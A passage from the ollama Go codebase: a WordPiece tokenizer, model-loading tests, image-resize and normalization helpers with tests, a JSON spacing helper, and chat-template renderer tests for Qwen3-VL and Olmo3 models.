len(word) var piece int32 for start < end { subword := word[start:end] if start == 0 { subword = ggmlPrefix + subword } if wpm.lowercase { subword = strings.ToLower(subword) } piece = wpm.vocab.Encode(subword) if piece >= 0 { break } end-- } if piece < 0 { // Unknown token pieces = pieces[:0] break } pieces = append(pieces, piece) start = end } if len(pieces) > 0 { ids = append(ids, pieces...) } else { ids = append(ids, unk) } } if addSpecial { ids = wpm.vocab.addSpecials(ids) } logutil.Trace("encoded", "string", s, "ids", ids) return ids, nil } // Is implements TextProcessor. func (wpm WordPiece) Is(id int32, special Special) bool { return wpm.vocab.Is(id, special) } // Vocabulary implements TextProcessor. func (wpm WordPiece) Vocabulary() *Vocabulary { return wpm.vocab } var _ TextProcessor = (*WordPiece)(nil) func NewWordPiece(vocab *Vocabulary, lowercase bool) WordPiece { return WordPiece{ vocab: vocab, lowercase: lowercase, } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/model_test.go
model/model_test.go
package model import ( "errors" "reflect" "slices" "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/fs" fsggml "github.com/ollama/ollama/fs/ggml" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/backend/ggml" "github.com/ollama/ollama/ml/nn" ) func TestParseTags(t *testing.T) { cases := []struct { value string want Tag }{ { value: "output", want: Tag{ name: "output", }, }, { value: "output,alt:token_embd", want: Tag{ name: "output", alternatives: []string{ "token_embd", }, }, }, } for _, tt := range cases { t.Run(tt.value, func(t *testing.T) { got := parseTag(tt.value) if diff := cmp.Diff(tt.want, got, cmp.AllowUnexported((Tag{}))); diff != "" { t.Errorf("ParseTags() returned unexpected values (-want +got):\n%s", diff) } }) } } type fakeBackend struct { *ggml.Backend names []string } type fakeTensor struct { *ggml.Tensor Name string } func (m *fakeBackend) Get(name string) ml.Tensor { if slices.Contains(m.names, name) { return &fakeTensor{Name: name} } return nil } func TestPopulateFields(t *testing.T) { type fakeLayer struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_o"` } type fakeModel struct { Input *nn.Embedding `gguf:"input"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output"` Layers [2]fakeLayer `gguf:"blk"` } var m fakeModel v := reflect.ValueOf(&m) v.Elem().Set(populateFields(Base{b: &fakeBackend{ names: []string{ "input.weight", "blk.0.attn_q.weight", "blk.0.attn_k.weight", "blk.0.attn_v.weight", "blk.1.attn_q.weight", "blk.1.attn_k.weight", "blk.1.attn_v.weight", "output_norm.weight", "output.weight", }, }}, v.Elem())) if diff := cmp.Diff(fakeModel{ Input: &nn.Embedding{Weight: &fakeTensor{Name: "input.weight"}}, OutputNorm: &nn.RMSNorm{Weight: &fakeTensor{Name: "output_norm.weight"}}, Output: &nn.Linear{Weight: &fakeTensor{Name: "output.weight"}}, Layers: [2]fakeLayer{ { Query: &nn.Linear{Weight: &fakeTensor{Name: "blk.0.attn_q.weight"}}, Key: &nn.Linear{Weight: &fakeTensor{Name: "blk.0.attn_k.weight"}}, Value: &nn.Linear{Weight: &fakeTensor{Name: "blk.0.attn_v.weight"}}, }, { Query: &nn.Linear{Weight: &fakeTensor{Name: "blk.1.attn_q.weight"}}, Key: &nn.Linear{Weight: &fakeTensor{Name: "blk.1.attn_k.weight"}}, Value: &nn.Linear{Weight: &fakeTensor{Name: "blk.1.attn_v.weight"}}, }, }, }, m); diff != "" { t.Errorf("populateFields() set incorrect values (-want +got):\n%s", diff) } } func TestPopulateFieldsAlternateName(t *testing.T) { type nested struct { Weight *nn.Linear `gguf:"a,alt:b"` } type fakeModel struct { Input *nn.Embedding `gguf:"input"` Output *nn.Linear `gguf:"output,alt:input"` Nested *nested `gguf:"nested"` Tensor ml.Tensor `gguf:"leaf,alt:tensor"` } var m fakeModel v := reflect.ValueOf(&m) v.Elem().Set(populateFields(Base{b: &fakeBackend{ names: []string{ "input.weight", "nested.b.weight", "leaf", }, }}, v.Elem())) if diff := cmp.Diff(fakeModel{ Input: &nn.Embedding{Weight: &fakeTensor{Name: "input.weight"}}, Output: &nn.Linear{Weight: &fakeTensor{Name: "input.weight"}}, Nested: &nested{ Weight: &nn.Linear{Weight: &fakeTensor{Name: "nested.b.weight"}}, }, Tensor: &fakeTensor{Name: "leaf"}, }, m); diff != "" { t.Errorf("populateFields() set incorrect values (-want +got):\n%s", diff) } } func TestPopulateFieldsPrefixSuffixName(t *testing.T) { type fakeBlock struct { A *nn.Linear `gguf:"a"` B *nn.Linear `gguf:",pre:b_"` C *nn.Linear `gguf:",suf:_c"` XY *nn.Linear `gguf:",pre:x_,suf:_y"` } type fakeModel struct { Blocks []fakeBlock `gguf:"blk"` } m := fakeModel{ Blocks: make([]fakeBlock, 2), } v := reflect.ValueOf(&m) v.Elem().Set(populateFields(Base{b: &fakeBackend{ names: []string{ "blk.0.a.weight", "blk.0.b_weight", "blk.0.b_bias", "blk.0.weight_c", "blk.0.x_weight_y", "blk.1.a.weight", "blk.1.b_weight", "blk.1.b_bias", "blk.1.weight_c", "blk.1.x_weight_y", }, }}, v.Elem())) if diff := cmp.Diff(fakeModel{ Blocks: []fakeBlock{ { A: &nn.Linear{Weight: &fakeTensor{Name: "blk.0.a.weight"}}, B: &nn.Linear{Weight: &fakeTensor{Name: "blk.0.b_weight"}, Bias: &fakeTensor{Name: "blk.0.b_bias"}}, C: &nn.Linear{Weight: &fakeTensor{Name: "blk.0.weight_c"}}, XY: &nn.Linear{Weight: &fakeTensor{Name: "blk.0.x_weight_y"}}, }, { A: &nn.Linear{Weight: &fakeTensor{Name: "blk.1.a.weight"}}, B: &nn.Linear{Weight: &fakeTensor{Name: "blk.1.b_weight"}, Bias: &fakeTensor{Name: "blk.1.b_bias"}}, C: &nn.Linear{Weight: &fakeTensor{Name: "blk.1.weight_c"}}, XY: &nn.Linear{Weight: &fakeTensor{Name: "blk.1.x_weight_y"}}, }, }, }, m); diff != "" { t.Errorf("populateFields() set incorrect values (-want +got):\n%s", diff) } } func TestModelForArch(t *testing.T) { type fakeModel struct { Model } type fakeEmbeddingModel struct { Model } models["model"] = func(c fs.Config) (Model, error) { return fakeModel{}, nil } models["model_embed"] = func(c fs.Config) (Model, error) { return fakeEmbeddingModel{}, nil } cases := []struct { name string config fs.Config want any err error }{ { name: "model", config: fsggml.KV{ "general.architecture": "model", }, want: fakeModel{}, }, { name: "embedding", config: fsggml.KV{ "general.architecture": "model", "model.pooling_type": uint32(1), }, want: fakeEmbeddingModel{}, }, { name: "unsupported", config: fsggml.KV{ "general.architecture": "unsupported", }, err: ErrUnsupportedModel, }, } for _, tt := range cases { t.Run(tt.name, func(t *testing.T) { got, err := modelForArch(tt.config) if !errors.Is(err, tt.err) { t.Fatal(err) } if diff := cmp.Diff(tt.want, got); diff != "" { t.Errorf("modelForArch() returned unexpected values (-want +got):\n%s", diff) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/textprocessor.go
model/textprocessor.go
package model const ( TOKEN_TYPE_NORMAL = iota + 1 TOKEN_TYPE_UNKNOWN TOKEN_TYPE_CONTROL TOKEN_TYPE_USER_DEFINED TOKEN_TYPE_UNUSED TOKEN_TYPE_BYTE ) type TextProcessor interface { Encode(s string, addSpecial bool) ([]int32, error) Decode([]int32) (string, error) Is(int32, Special) bool Vocabulary() *Vocabulary }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/wordpiece_test.go
model/wordpiece_test.go
package model import ( "slices" "testing" "github.com/google/go-cmp/cmp" ) func TestWordPiece(t *testing.T) { wpm := NewWordPiece( &Vocabulary{ Values: []string{"[UNK]", "[CLS]", "[SEP]", "▁hello", "▁world", "s", "▁!", "▁@", "▁#"}, AddBOS: true, AddEOS: true, BOS: []int32{1}, EOS: []int32{2}, }, true, // lowercase ) ids, err := wpm.Encode("Hello world!", true) if err != nil { t.Fatal(err) } if diff := cmp.Diff([]int32{1, 3, 4, 6, 2}, ids); diff != "" { t.Errorf("unexpected ids (-want +got):\n%s", diff) } words, err := wpm.Decode(ids) if err != nil { t.Fatal(err) } if diff := cmp.Diff("[CLS] hello world! [SEP]", words); diff != "" { t.Errorf("unexpected words (-want +got):\n%s", diff) } } func TestWordPieceWords(t *testing.T) { var wpm WordPiece basic := slices.Collect(wpm.words("Hey friend! How are you?!?")) if diff := cmp.Diff([]string{"Hey", "friend", "!", "How", "are", "you", "?", "!", "?"}, basic); diff != "" { t.Errorf("unexpected words (-want +got):\n%s", diff) } chinese := slices.Collect(wpm.words("野口里佳 Noguchi Rika")) if diff := cmp.Diff([]string{"野", "口", "里", "佳", "Noguchi", "Rika"}, chinese); diff != "" { t.Errorf("unexpected words (-want +got):\n%s", diff) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/imageproc/images.go
model/imageproc/images.go
package imageproc import ( "image" "image/color" "golang.org/x/image/draw" ) var ( ImageNetDefaultMean = [3]float32{0.485, 0.456, 0.406} ImageNetDefaultSTD = [3]float32{0.229, 0.224, 0.225} ImageNetStandardMean = [3]float32{0.5, 0.5, 0.5} ImageNetStandardSTD = [3]float32{0.5, 0.5, 0.5} ClipDefaultMean = [3]float32{0.48145466, 0.4578275, 0.40821073} ClipDefaultSTD = [3]float32{0.26862954, 0.26130258, 0.27577711} ) const ( ResizeBilinear = iota ResizeNearestNeighbor ResizeApproxBilinear ResizeCatmullrom ) // Composite returns an image with the alpha channel removed by drawing over a white background. func Composite(img image.Image) image.Image { white := color.RGBA{255, 255, 255, 255} return CompositeColor(img, white) } // CompositeColor returns an image with the alpha channel removed by drawing over a white background. func CompositeColor(img image.Image, color color.Color) image.Image { dst := image.NewRGBA(img.Bounds()) draw.Draw(dst, dst.Bounds(), &image.Uniform{color}, image.Point{}, draw.Src) draw.Draw(dst, dst.Bounds(), img, img.Bounds().Min, draw.Over) return dst } // Resize returns an image which has been scaled to a new size. func Resize(img image.Image, newSize image.Point, method int) image.Image { dst := image.NewRGBA(image.Rect(0, 0, newSize.X, newSize.Y)) kernels := map[int]draw.Interpolator{ ResizeBilinear: draw.BiLinear, ResizeNearestNeighbor: draw.NearestNeighbor, ResizeApproxBilinear: draw.ApproxBiLinear, ResizeCatmullrom: draw.CatmullRom, } kernel, ok := kernels[method] if !ok { panic("no resizing method found") } kernel.Scale(dst, dst.Rect, img, img.Bounds(), draw.Over, nil) return dst } // Pad returns an image which has been resized to fit within a new size, preserving aspect ratio, and padded with a color. func Pad(img image.Image, newSize image.Point, color color.Color, kernel draw.Interpolator) image.Image { dst := image.NewRGBA(image.Rect(0, 0, newSize.X, newSize.Y)) draw.Draw(dst, dst.Bounds(), &image.Uniform{color}, image.Point{}, draw.Src) var minPoint, maxPoint image.Point if img.Bounds().Dx() > img.Bounds().Dy() { // landscape height := newSize.X * img.Bounds().Dy() / img.Bounds().Dx() minPoint = image.Point{0, (newSize.Y - height) / 2} maxPoint = image.Point{newSize.X, height + minPoint.Y} } else { // portrait width := newSize.Y * img.Bounds().Dx() / img.Bounds().Dy() minPoint = image.Point{(newSize.X - width) / 2, 0} maxPoint = image.Point{minPoint.X + width, newSize.Y} } kernel.Scale(dst, image.Rectangle{ Min: minPoint, Max: maxPoint, }, img, img.Bounds(), draw.Over, nil) return dst } // Normalize returns a slice of float32 containing each of the r, g, b values for an image normalized around a value. func Normalize(img image.Image, mean, std [3]float32, rescale bool, channelFirst bool) []float32 { var pixelVals []float32 bounds := img.Bounds() if channelFirst { var rVals, gVals, bVals []float32 for y := bounds.Min.Y; y < bounds.Max.Y; y++ { for x := bounds.Min.X; x < bounds.Max.X; x++ { c := img.At(x, y) r, g, b, _ := c.RGBA() var rVal, gVal, bVal float32 if rescale { rVal = float32(r>>8) / 255.0 gVal = float32(g>>8) / 255.0 bVal = float32(b>>8) / 255.0 } rVal = (rVal - mean[0]) / std[0] gVal = (gVal - mean[1]) / std[1] bVal = (bVal - mean[2]) / std[2] rVals = append(rVals, rVal) gVals = append(gVals, gVal) bVals = append(bVals, bVal) } } pixelVals = append(pixelVals, rVals...) pixelVals = append(pixelVals, gVals...) pixelVals = append(pixelVals, bVals...) } else { for y := bounds.Min.Y; y < bounds.Max.Y; y++ { for x := bounds.Min.X; x < bounds.Max.X; x++ { c := img.At(x, y) r, g, b, _ := c.RGBA() var rVal, gVal, bVal float32 if rescale { rVal = float32(r>>8) / 255.0 gVal = float32(g>>8) / 255.0 bVal = float32(b>>8) / 255.0 } rVal = (rVal - mean[0]) / std[0] gVal = (gVal - mean[1]) / std[1] bVal = (bVal - mean[2]) / std[2] pixelVals = append(pixelVals, rVal, gVal, bVal) } } } return pixelVals }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/imageproc/images_test.go
model/imageproc/images_test.go
package imageproc import ( "image" "image/color" "image/draw" "reflect" "testing" ) func createImage(width, height int, fillCol color.RGBA) image.Image { img := image.NewRGBA(image.Rect(0, 0, width, height)) draw.Draw(img, img.Bounds(), &image.Uniform{fillCol}, image.Point{}, draw.Src) return img } func TestComposite(t *testing.T) { tests := []struct { name string img image.Image expectedRGBA color.RGBA }{ { name: "Transparent image", img: createImage(5, 5, color.RGBA{0, 0, 0, 0}), expectedRGBA: color.RGBA{255, 255, 255, 255}, }, { name: "Solid red image", img: createImage(5, 5, color.RGBA{255, 0, 0, 255}), expectedRGBA: color.RGBA{255, 0, 0, 255}, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { resultImg := Composite(tt.img) // Check the pixel values in the resulting image for x := range resultImg.Bounds().Dx() { for y := range resultImg.Bounds().Dy() { r, g, b, a := resultImg.At(x, y).RGBA() expectedR, expectedG, expectedB, expectedA := tt.expectedRGBA.RGBA() if r != expectedR || g != expectedG || b != expectedB || a != expectedA { t.Errorf("Pixel mismatch at (%d, %d): got (%d, %d, %d, %d), want (%d, %d, %d, %d)", x, y, r, g, b, a, expectedR, expectedG, expectedB, expectedA) } } } }) } } func TestResize(t *testing.T) { tests := []struct { name string img image.Image newSize image.Point method int expected image.Point }{ { name: "Resize with bilinear interpolation", img: createImage(5, 5, color.RGBA{255, 0, 0, 255}), newSize: image.Point{10, 10}, method: ResizeBilinear, expected: image.Point{10, 10}, }, { name: "Resize with nearest neighbor", img: createImage(10, 10, color.RGBA{0, 255, 0, 255}), newSize: image.Point{5, 5}, method: ResizeNearestNeighbor, expected: image.Point{5, 5}, }, { name: "Resize with catmullrom", img: createImage(1024, 1024, color.RGBA{0, 0, 255, 255}), newSize: image.Point{10, 10}, method: ResizeCatmullrom, expected: image.Point{10, 10}, }, { name: "Resize with approx bilinear", img: createImage(1024, 768, color.RGBA{100, 100, 100, 255}), newSize: image.Point{4, 3}, method: ResizeApproxBilinear, expected: image.Point{4, 3}, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { resizedImg := Resize(tt.img, tt.newSize, tt.method) if resizedImg.Bounds().Dx() != tt.expected.X || resizedImg.Bounds().Dy() != tt.expected.Y { t.Errorf("Unexpected size for resized image: got (%d, %d), want (%d, %d)", resizedImg.Bounds().Dx(), resizedImg.Bounds().Dy(), tt.expected.X, tt.expected.Y) } }) } } func TestResizeInvalidMethod(t *testing.T) { defer func() { if r := recover(); r == nil { t.Errorf("Expected panic for invalid resizing method, but did not panic") } }() img := createImage(10, 10, color.RGBA{0, 0, 0, 255}) Resize(img, image.Point{5, 5}, -1) } func TestNormalize(t *testing.T) { tests := []struct { name string img image.Image mean [3]float32 std [3]float32 rescale bool channelFirst bool expected []float32 }{ { name: "Rescale with channel first", img: createImage(2, 2, color.RGBA{128, 128, 128, 255}), mean: ImageNetStandardMean, std: ImageNetStandardSTD, rescale: true, channelFirst: true, expected: []float32{ 0.003921628, 0.003921628, 0.003921628, 0.003921628, // R values 0.003921628, 0.003921628, 0.003921628, 0.003921628, // G values 0.003921628, 0.003921628, 0.003921628, 0.003921628, // B values }, }, { name: "Rescale without channel first", img: createImage(2, 2, color.RGBA{255, 0, 0, 255}), mean: [3]float32{0.0, 0.0, 0.0}, std: [3]float32{1.0, 1.0, 1.0}, rescale: true, channelFirst: false, expected: []float32{ 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0, }, }, { name: "No rescale with mean/std adjustment", img: createImage(2, 2, color.RGBA{100, 150, 200, 255}), mean: ClipDefaultMean, std: ClipDefaultSTD, rescale: false, channelFirst: false, expected: []float32{ -1.7922626, -1.7520971, -1.4802198, -1.7922626, -1.7520971, -1.4802198, -1.7922626, -1.7520971, -1.4802198, -1.7922626, -1.7520971, -1.4802198, }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { result := Normalize(tt.img, tt.mean, tt.std, tt.rescale, tt.channelFirst) if !reflect.DeepEqual(result, tt.expected) { t.Errorf("Test %s failed: got %v, want %v", tt.name, result, tt.expected) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/qwen3vl_thinking_test.go
model/renderers/qwen3vl_thinking_test.go
package renderers import ( "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestQwen3VLThinkingRenderer(t *testing.T) { tests := []struct { name string msgs []api.Message images []api.ImageData tools []api.Tool expected string }{ { name: "basic", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello, how are you?"}, }, expected: `<|im_start|>system You are a helpful assistant.<|im_end|> <|im_start|>user Hello, how are you?<|im_end|> <|im_start|>assistant <think> `, }, { name: "With thinking, end assistant.", msgs: []api.Message{ {Role: "user", Content: "Tell me a story in two sentences."}, {Role: "assistant", Content: "abc", Thinking: "To make this story interesting, I will speak in poetry."}, }, expected: `<|im_start|>user Tell me a story in two sentences.<|im_end|> <|im_start|>assistant <think> To make this story interesting, I will speak in poetry. </think> abc`, }, { name: "With thinking, end assistant.", msgs: []api.Message{ {Role: "user", Content: "Tell me a story in two sentences."}, {Role: "assistant", Thinking: "To make this story interesting, I will speak in poetry."}, }, expected: `<|im_start|>user Tell me a story in two sentences.<|im_end|> <|im_start|>assistant <think> To make this story interesting, I will speak in poetry.`, }, { name: "Multiple thinking", msgs: []api.Message{ {Role: "user", Content: "Tell me a story in two sentences."}, {Role: "assistant", Content: "abc", Thinking: "To make this story interesting, I will speak in poetry.<think>And I will speak in poetry after the first sentence.</think>"}, }, expected: `<|im_start|>user Tell me a story in two sentences.<|im_end|> <|im_start|>assistant <think> To make this story interesting, I will speak in poetry.<think>And I will speak in poetry after the first sentence.</think> </think> abc`, // NOTE: the second thinking tag is not captured }, { name: "Multiple thinking, multiple messages.", msgs: []api.Message{ {Role: "user", Content: "Tell me a story in two sentences."}, {Role: "assistant", Thinking: "To make this story interesting, I will speak in poetry.", Content: "abc"}, {Role: "user", Content: "What is the weather like in San Francisco?"}, {Role: "assistant", Thinking: "Speak poetry after the first sentence.</think><think>Speak poetry after the second sentence."}, }, expected: `<|im_start|>user Tell me a story in two sentences.<|im_end|> <|im_start|>assistant abc<|im_end|> <|im_start|>user What is the weather like in San Francisco?<|im_end|> <|im_start|>assistant <think> Speak poetry after the first sentence.</think><think>Speak poetry after the second sentence.`, }, // NOTE: Servers automatically prepend a [img-<n>] tag // { // name: "Image", // msgs: []api.Message{ // {Role: "user", Content: "Describe this image.", Images: []api.ImageData{api.ImageData(IMAGE2_BASE64)}}, // }, // expected: `<|im_start|>user // [img-0]Describe this image.<|im_end|> // <|im_start|>assistant // <think> // `, // }, // NOTE: Servers automatically prepend a [img-<n>] tag // { // name: "Multiple images", // msgs: []api.Message{ // {Role: "user", Content: "Describe these images.", Images: []api.ImageData{api.ImageData(IMAGE1_BASE64), api.ImageData(IMAGE2_BASE64)}}, // }, // expected: `<|im_start|>user // [img-0][img-1]Describe these images.<|im_end|> // <|im_start|>assistant // <think> // `, // }, // NOTE: solved with #12518: https://github.com/ollama/ollama/compare/main...drifkin/stable-tool-args // { // name: "with tools and response", // msgs: []api.Message{ // {Role: "system", Content: "You are a helpful assistant with access to tools."}, // {Role: "user", Content: "What's the weather like in New York?"}, // { // Role: "assistant", // Content: "I'll check the weather in New York for you.", // ToolCalls: []api.ToolCall{ // { // Function: api.ToolCallFunction{ // Name: "get-current-weather", // Arguments: testArgs(map[string]any{ // "location": "New York", // "unit": "fahrenheit", // }), // }, // }, // }, // }, // {Role: "tool", Content: "80", ToolName: "get-current-weather"}, // {Role: "user", Content: "That sounds nice! What about San Francisco?"}, // }, // tools: []api.Tool{ // { // Type: "function", // Function: api.ToolFunction{ // Name: "get-current-weather", // Description: "Get the current weather for a location", // Parameters: api.ToolFunctionParameters{ // Type: "object", // Required: []string{"location"}, // Properties: testPropsMap(map[string]api.ToolProperty{ // "location": { // Type: api.PropertyType{"string"}, // Description: "The city and state, e.g. San Francisco, CA", // }, // "unit": { // Type: api.PropertyType{"string"}, // Enum: []any{"celsius", "fahrenheit"}, // Description: "The temperature unit", // }, // }), // }, // }, // }, // }, // expected: `<|im_start|>system // You are a helpful assistant with access to tools. // # Tools // You may call one or more functions to assist with the user query. // You are provided with function signatures within <tools></tools> XML tags: // <tools> // {"type": "function", "function": {"name": "get-current-weather", "description": "Get the current weather for a location", "parameters": {"type": "object", "properties": {"location": {"type": "string", "description": "The city and state, e.g. San Francisco, CA"}, "unit": {"type": "string", "enum": ["celsius", "fahrenheit"], "description": "The temperature unit"}}, "required": ["location"]}}} // </tools> // For each function call, return a json object with function name and arguments within <tool_call></tool_call> XML tags: // <tool_call> // {"name": <function-name>, "arguments": <args-json-object>} // </tool_call><|im_end|> // <|im_start|>user // What's the weather like in New York?<|im_end|> // <|im_start|>assistant // I'll check the weather in New York for you. // <tool_call> // {"name": "get-current-weather", "arguments": {"location": "New York", "unit": "fahrenheit"}} // </tool_call><|im_end|> // <|im_start|>user // <tool_response> // 80 // </tool_response><|im_end|> // <|im_start|>user // That sounds nice! What about San Francisco?<|im_end|> // <|im_start|>assistant // <think> // `, // }, // NOTE: solved with #12518: https://github.com/ollama/ollama/compare/main...drifkin/stable-tool-args // { // name: "With tools and response, multiple tool calls", // msgs: []api.Message{ // { // Role: "system", // Content: "You are a helpful assistant with access to tools.", // }, // { // Role: "user", // Content: "Call two tools for me: add and multiply.", // }, // { // Role: "assistant", // Content: "Sure, I'll call both tools for you.", // ToolCalls: []api.ToolCall{ // { // Function: api.ToolCallFunction{ // Name: "add", // Arguments: testArgs(map[string]any{ // "a": 2, // "b": 3, // }), // }, // }, // { // Function: api.ToolCallFunction{ // Name: "multiply", // Arguments: testArgs(map[string]any{ // "x": 4, // "y": 5, // }), // }, // }, // }, // }, // { // Role: "tool", // Content: "5", // ToolName: "add", // }, // { // Role: "tool", // Content: "20", // ToolName: "multiply", // }, // { // Role: "user", // Content: "Thanks! What are the results?", // }, // }, // tools: []api.Tool{ // { // Type: "function", // Function: api.ToolFunction{ // Name: "add", // Description: "Add two numbers", // Parameters: api.ToolFunctionParameters{ // Type: "object", // Required: []string{"a", "b"}, // Properties: testPropsMap(map[string]api.ToolProperty{ // "a": {Type: api.PropertyType{"integer"}, Description: "First number"}, // "b": {Type: api.PropertyType{"integer"}, Description: "Second number"}, // }), // }, // }, // }, // { // Type: "function", // Function: api.ToolFunction{ // Name: "multiply", // Description: "Multiply two numbers", // Parameters: api.ToolFunctionParameters{ // Type: "object", // Required: []string{"x", "y"}, // Properties: testPropsMap(map[string]api.ToolProperty{ // "x": {Type: api.PropertyType{"integer"}, Description: "First factor"}, // "y": {Type: api.PropertyType{"integer"}, Description: "Second factor"}, // }), // }, // }, // }, // }, // expected: `<|im_start|>system // You are a helpful assistant with access to tools. // # Tools // You may call one or more functions to assist with the user query. // You are provided with function signatures within <tools></tools> XML tags: // <tools> // {"type": "function", "function": {"name": "add", "description": "Add two numbers", "parameters": {"type": "object", "properties": {"a": {"type": "integer"}, "b": {"type": "integer"}}, "required": ["a", "b"]}}} // {"type": "function", "function": {"name": "multiply", "description": "Multiply two numbers", "parameters": {"type": "object", "properties": {"x": {"type": "integer"}, "y": {"type": "integer"}}, "required": ["x", "y"]}}} // </tools> // For each function call, return a json object with function name and arguments within <tool_call></tool_call> XML tags: // <tool_call> // {"name": <function-name>, "arguments": <args-json-object>} // </tool_call><|im_end|> // <|im_start|>user // Call two tools for me: add and multiply.<|im_end|> // <|im_start|>assistant // Sure, I'll call both tools for you. // <tool_call> // {"name": "add", "arguments": {"a": 2, "b": 3}} // </tool_call> // <tool_call> // {"name": "multiply", "arguments": {"x": 4, "y": 5}} // </tool_call><|im_end|> // <|im_start|>user // <tool_response> // 5 // </tool_response> // <tool_response> // 20 // </tool_response><|im_end|> // <|im_start|>user // Thanks! What are the results?<|im_end|> // <|im_start|>assistant // <think> // `, // }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { rendered, err := (&Qwen3VLRenderer{isThinking: true}).Render(tt.msgs, tt.tools, nil) if err != nil { t.Fatal(err) } if diff := cmp.Diff(rendered, tt.expected); diff != "" { t.Errorf("mismatch (-got +want):\n%s", diff) } }) } } func TestFormatToolCallArgumentThinkingVL(t *testing.T) { tests := []struct { name string arg any expected string }{ { name: "string", arg: "foo", expected: "foo", }, { name: "map", arg: map[string]any{"foo": "bar"}, expected: "{\"foo\":\"bar\"}", }, { name: "number", arg: 1, expected: "1", }, { name: "boolean", arg: true, expected: "true", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { got := formatToolCallArgument(tt.arg) if got != tt.expected { t.Errorf("formatToolCallArgument(%v) = %v, want %v", tt.arg, got, tt.expected) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/json.go
model/renderers/json.go
package renderers import "encoding/json" // marshalWithSpaces marshals v to JSON and adds a space after each ':' and ',' // that appears outside of string values. This matches the formatting expected // by certain model architectures. func marshalWithSpaces(v any) ([]byte, error) { b, err := json.Marshal(v) if err != nil { return nil, err } out := make([]byte, 0, len(b)+len(b)/8) inStr, esc := false, false for _, c := range b { if inStr { out = append(out, c) if esc { esc = false continue } if c == '\\' { esc = true continue } if c == '"' { inStr = false } continue } switch c { case '"': inStr = true out = append(out, c) case ':': out = append(out, ':', ' ') case ',': out = append(out, ',', ' ') default: out = append(out, c) } } return out, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/olmo3_think_test.go
model/renderers/olmo3_think_test.go
package renderers import ( "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestOlmo3ThinkRenderer(t *testing.T) { tests := []struct { name string variant Olmo3ThinkVariant msgs []api.Message tools []api.Tool expected string }{ { name: "7b_basic_without_system", variant: Olmo31Think, msgs: []api.Message{ {Role: "user", Content: "Hello!"}, }, expected: "<|im_start|>system\n" + "You are Olmo, a helpful AI assistant built by Ai2. Your date cutoff is December 2024, and your model weights are available at https://huggingface.co/allenai.<|im_end|>\n" + "<|im_start|>user\n" + "Hello!<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>", }, { name: "7b_with_custom_system", variant: Olmo31Think, msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello!"}, }, expected: "<|im_start|>system\n" + "You are a helpful assistant. You do not currently have access to any functions. <functions></functions><|im_end|>\n" + "<|im_start|>user\n" + "Hello!<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>", }, { name: "7b_tools_ignored", variant: Olmo31Think, msgs: []api.Message{ {Role: "user", Content: "What is the weather?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get the current weather", }, }, }, expected: "<|im_start|>system\n" + "You are Olmo, a helpful AI assistant built by Ai2. Your date cutoff is December 2024, and your model weights are available at https://huggingface.co/allenai.<|im_end|>\n" + "<|im_start|>user\n" + "What is the weather?<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>", }, { name: "7b_tool_calls_and_tool_messages_ignored", variant: Olmo31Think, msgs: []api.Message{ {Role: "user", Content: "What is the weather in SF?"}, { Role: "assistant", Content: "Let me check the weather.", ToolCalls: []api.ToolCall{ { ID: "call_1", Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"location": "San Francisco"}), }, }, }, }, {Role: "tool", Content: `{"temperature": 68}`}, }, expected: "<|im_start|>system\n" + "You are Olmo, a helpful AI assistant built by Ai2. Your date cutoff is December 2024, and your model weights are available at https://huggingface.co/allenai.<|im_end|>\n" + "<|im_start|>user\n" + "What is the weather in SF?<|im_end|>\n" + "<|im_start|>assistant\n" + "Let me check the weather.<|im_end|>\n" + 